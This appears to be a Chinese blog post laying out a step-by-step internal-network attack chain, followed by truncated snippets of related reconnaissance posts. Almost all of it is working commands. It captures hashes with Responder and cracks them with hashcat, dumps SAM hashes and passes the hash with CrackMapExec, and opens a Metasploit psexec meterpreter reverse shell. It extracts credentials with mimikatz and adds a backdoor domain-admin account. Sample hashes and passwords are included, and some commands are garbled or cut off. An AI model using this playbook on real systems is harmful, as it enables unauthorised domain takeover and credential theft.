responder探測內網獲取域控許可權總結
(1)執行responder探測內網(
./responder.py -i eth0 -rpv
(2)獲取172.16.157.133的responder值
(3)使用crack map exec檢查此主機的netbios資訊
cme smb 172.16.157.133
(4)使用hashcat對responder值進行破解
hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule
獲取密碼值winter2018!
(5)cme掃瞄
cme smb 172.16.157.133 -u frontdesk -p 'winter2018!' --local-auth
(6)獲取本地的管理員帳戶對本地密碼雜湊進行dump
cme smb 172.16.157.133 -u frontdesk -p 'winter2018!' --local-auth --sam
(7)獲取frontdesk密碼的ntlm雜湊值
frontdesk:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::
(8)雜湊傳遞方式檢視本地網路的smb許可權情況
cme smb 172.16.157.0/24 -u administrator -h 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-
auth
(9)可以登入172.16.157.134伺服器
(10)對172.16.157.134進行檢視,該計算機具備域控許可權
cme smb 172.16.157.134
(11)msf下面利用smb口令進行shell獲取
use exploit/windows/smb/p***ec
set smbpass=aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51
set smbuser administrator
set playload windows/x64/meterpreter/reverse_tcp
rungetuid
(12)使用mimikatz獲取域控密碼
load mimikatz
kerberos
cme smb 172.16.157.135 -u administrator -p 'october17' -x 'net user markitzeroda hackerspassword! /add /domain /y && net group "domain admins" markitzeroda
python內網主機存活探測
1.在ubuntu系統下進行發包 2.使用python中的scapy模組 arp協議是 address resolution protocol 位址解析協議 的縮寫。其作用是在乙太網環境中,資料的傳輸所依懶的是mac位址而非ip位址,而將已知ip位址轉換為mac位址的工作是由arp協議來完成的。在區...
內網攻防 主機出網探測
本機防火牆規則獲取 netsh advfirewall firewall show rule name all 基於icmp的出網判斷 如果網域名稱被解析為ip,那麼表明dns協議可以出網 基於tcp的出網判斷 linux下 nc lvp vps port nc vps ip vps port wi...
內網探測 工作組資訊收集
0x01內網資訊的收集 內網資訊收集的概述 對當前環境進行判斷 工作組資訊的收集中 本機的資訊收集 資訊收集階段 tasklist v 查詢程序 這也可以查程序 獲取作業系統和版本資訊 systeminfo findstr b c os名稱 c os版本 本機資訊收集 查詢埠 netstat ano...